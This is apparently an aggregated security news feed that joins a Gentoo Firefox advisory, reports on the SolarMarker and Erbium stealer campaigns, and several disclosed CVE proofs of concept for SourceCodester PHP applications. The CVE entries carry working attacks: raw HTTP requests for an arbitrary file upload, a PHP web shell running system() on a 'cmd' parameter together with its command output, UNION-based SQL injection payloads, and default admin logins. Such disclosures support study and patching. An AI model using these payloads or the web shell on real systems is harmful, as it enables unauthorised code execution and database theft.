Billing System Project v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/createProduct.php.

Permalink

**Billing System Project v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Mogui Dong

vendors: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayurik/rootadmin (Super Admin account)

Vulnerability url: ip/phpinventory/php\_action/createProduct.php

Loophole location: Billing System Project's createProduct.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /phpinventory/php\_action/createProduct.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/phpinventory/add-product.php
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------992928208515
Content-Length: 1010
\-----------------------------992928208515
Content-Disposition: form-data; name="currnt\_date"
\-----------------------------992928208515
Content-Disposition: form-data; name="productImage"; filename="hackl.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------992928208515
Content-Disposition: form-data; name="productName"
1
\-----------------------------992928208515
Content-Disposition: form-data; name="quantity"
1
\-----------------------------992928208515
Content-Disposition: form-data; name="rate"
1
\-----------------------------992928208515
Content-Disposition: form-data; name="brandName"
2
\-----------------------------992928208515
Content-Disposition: form-data; name="categoryName"
1
\-----------------------------992928208515
Content-Disposition: form-data; name="productStatus"
2
\-----------------------------992928208515
Content-Disposition: form-data; name="create"
\-----------------------------992928208515--

The files will be uploaded to this directory 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41437: bug_report/RCE-1.md at main · chi645190147/bug_report

Gentoo Linux Security Advisory 202209-27 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.3.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #872059  
       ID: 202209-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid  
  2  www-client/firefox-bin     < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.3.0"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.3.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-105.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-105.0"

References  
=========  
[ 1 ] CVE-2022-40956  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40956  
[ 2 ] CVE-2022-40957  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40957  
[ 3 ] CVE-2022-40958  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40958  
[ 4 ] CVE-2022-40959  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40959  
[ 5 ] CVE-2022-40960  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40960  
[ 6 ] CVE-2022-40962  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40962

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-27

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-27

The SolarMarker group is exploiting a vulnerable WordPress-run website to encourage victims to download fake Chrome browser updates, part of a new tactic in its watering-hole attacks.

Researchers have discovered the cyberattack group behind the SolarMarker malware targeting a global tax consulting organization with a presence in the US, Canada, the UK, and Europe, which is using fake Chrome browser updates as part of watering hole attacks.  

It's a new approach for the group, replacing its previous method of search engine optimization (SEO) poisoning, also known as spamdexing.

SolarMarker is multistage malware which can exfiltrate autofill data, saved passwords, and saved credit card information from victims' Web browsers.

**Preparation for a Wider Attack?**

According to an advisory published by eSentire's Threat Response Unit (TRU) on Friday, the threat group was seen exploiting weaknesses in a medical equipment manufacturer's website, which was built with the popular open source content management system WordPress.

The victim was an employee of a tax consulting organization and searched for the manufacturer by name on Google.

"This tricked the employee into downloading and executing SolarMarker, which was disguised as a Chrome update," the advisory noted.

"The fake browser update overlay design is based on what browser the victim is utilizing while visiting the infected website," the advisory added. "Besides Chrome, the user might also receive the fake Firefox or Edge update PHP page."

It is unclear whether the SolarMarker group is testing new tactics or preparing for a wider campaign, given that the TRU team has only observed a single infection of this vector type — previous SolarMarker attacks used SEO poisoning to hit people who searched online for free templates of popular business documents and business forms.

**Monitor Endpoints, Raise Employee Awareness**

The TRU advisory outlines four key steps organizations can take to reduce the impact of these kinds of attacks, including raising employee awareness regarding browser updates that occur automatically, and avoiding downloading files from unknown sites.

"Threat actors research the kind of documents businesses look for and try to get in front of them with SEO," the advisory stated. "Only use trusted sources when downloading content from the internet, and avoid free and bundled software."

The advisory also recommended more vigilant endpoint monitoring, which TRU adds will require more frequent rule updates to detect the latest campaigns, as well as enhanced threat-landscape monitoring to bolster the organization's overall defense posture.

**SolarMarker Campaigns Back After Dormant Period**

The .NET malware was first discovered in 2020 and is typically spread via a PowerShell installer, with information-gathering capabilities and a backdoor.

In October 2021, Sophos Labs observed a number of active SolarMarker campaigns that followed a common pattern: using SEO techniques, the cybercriminals managed to place links to websites with Trojanized content in the search results of several search engines.

A previous SolarMarker campaign reported by Menlo Security in October 2021 used more than 2,000 unique search terms, luring users to sites that then dropped malicious PDFs rigged with backdoors.

SolarMarker Attack Leverages Weak WordPress Sites, Fake Chrome Browser Updates

SourceCodester Best Student Result Management System 1.0 is vulnerable to SQL Injection.

**Title: Best Student Result Management System 1.0 SQLi****Author: toyydsBT123****organize: Arr3stY0u****Organization introduction : https://www.shg-sec.com/****Date: 15.09.2022****Vendor: https://www.sourcecodester.com/users/mayurik****Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download****Version: 1.0****Reference: https://github.com/toyydsBT123/One\_of\_my\_take\_on\_SourceCodester/blob/main/Best-Student-Result-Management-System\_1.0.poc.md****Description:****The joint query injects the selected item into the query, and can obtain system information and administrator account password. The SQL injection vulnerability on this page severely compromises the security, confidentiality of the application by exposing the application to administrator level information compromise.****Status: CRITICAL****\[+\] Payloads:**

    GET
    ?nid=2' union all select null,user(),null,null-- -
    

**Proof and Exploit:**

code Firefox browser

CVE-2022-40887: One_of_my_take_on_SourceCodester/Best-Student-Result-Management-System_1.0.poc.md at main · toyydsBT123/One_of_my_take_on_SourceCodester

IBM Rational Change 5.3 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the SUPP_TEMPLATE_FLAG parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

CVE-2012-2160: Fix List for Rational Change

Categories: News
Tags: erbium

Tags:  malware

Tags:  data theft

Tags:  stealer

Tags:  wallets

Tags:  cryptocurrency

Tags:  browsers

Tags:  browser

Tags:  infection

Tags:  malware as a service

We take a look at reports of new data theft malware relying on sold old tricks



(Read more...)




The post Erbium stealer on the hunt for data appeared first on Malwarebytes Labs.

There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims. Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.

A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.

Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.

In fact, many of the cryptocurrency wallets targeted are browser extensions. According to Bleeping Computer, this includes iWallet, Clover Wallet, Steem Keychain, ZilPay and many more. Several cold wallets are also in the malware’s crosshairs, and to top it all off it does of course have the ability to take screenshots of the victim’s desktop.

The most recent campaign described by researchers uses well worn tricks which never seem to go out of fashion. Specifically: Malware stored on free file hosting, posing as cheats or cracks. Using free file hosting for malware storage makes it easy for its operators to set up shop somewhere else, should the malware be taken down by the hosts.

The attackers are said to make use of drive-by download techniques to spread the files—a term that covers all forms of unintended software installation, such as software installed via browser exploits, or bundled with legitimate downloads. There are no more specifics, but outside of this campaign, it is very common to see these sorts of files promoted on fake Youtube videos or even in the comments under legitimate videos.

Once enough data is gathered by the malware authors, it’s off to the underground marketplaces to trade and / or sell the stolen information. Erbium has become very popular in recent months, with Bleeping Computer reporting the cost of doing business has risen from $9 per week to $100 per month.

Competition is fierce in malware-as-a-service land, but Erbium seems to be sticking around.

Users of Malwarebytes are protected from the two payloads mentioned in the Duskrise article \[1\], \[2\], and the various payloads \[1\], \[2\] listed in the Cyfirma writeup.

Stay safe out there!

Erbium stealer on the hunt for data

In Exam Reviewer Management System 1.0, an authenticated attacker can upload a web-shell php file in profile page to achieve Remote Code Execution (RCE).

    # Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
    # Date: 2022-02-08
    # Exploit Author:  Juli Agarwal(@agarwaljuli)
    # Vendor Homepage:
    https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
    
    # Software Link:
    https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
    
    # Version: 1.0
    # Tested on: XAMPP, Kali Linux
    
    
    
    Description – The application suffers from a remote code execution in the
    admin panel. An authenticated attacker can upload a web-shell php file in
    profile page to achieve remote code execution.
    
    
    
    POC:-
    
    
    
    ==========
    
    # Request:
    
    ==========
    
    POST /erms/classes/Users.php?f=save HTTP/1.1
    
    Host: localhost
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
    Firefox/91.0
    
    Accept: */*
    
    Accept-Language: en-US,en;q=0.5
    
    X-Requested-With: XMLHttpRequest
    
    Content-Type: multipart/form-data;
    boundary=---------------------------37791356766765055891341961306
    
    Content-Length: 1004
    
    Origin: http://localhost
    
    Connection: close
    
    Referer: http://localhost/erms/admin/?page=user
    
    Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
    
    
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="id"
    
    
    
    1
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="firstname"
    
    
    
    Adminstrator
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="lastname"
    
    
    
    Admin
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="username"
    
    
    
    admin
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="password"
    
    
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="img"; filename="shell.php"
    
    Content-Type: application/x-php
    
    
    
    <html>
    
    <body>
    
    <b>Remote code execution: </b><br><pre>
    
                                  <?php if(isset($_REQUEST['cmd'])){ echo
    "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
    
    </pre>
    
    </body>
    
    </html>
    
    
    
    -----------------------------37791356766765055891341961306—
    
    
    
    ================
    
    # Webshell access:
    
    ================
    
    
    
    # Webshell access via:
    
    POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
    
    
    
    # Webshell response:
    
    Remote code execution:
    
    uid=1(daemon) gid=1(daemon) groups=1(daemon)

CVE-2022-40878: Offensive Security’s Exploit Database Archive

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_booking.php

Vulnerability location: /tour/admin/update\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/update\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40354: Bug_report/SQLi-3.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/up_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/up\_booking.php

Vulnerability location: /tour/admin/up\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/up\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/up\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40353: Bug_report/SQLi-2.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_traveller.php

Vulnerability location: /tour/admin/update\_traveller.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_traveller.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /tour/admin/update\_traveller.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

Tag

#firefox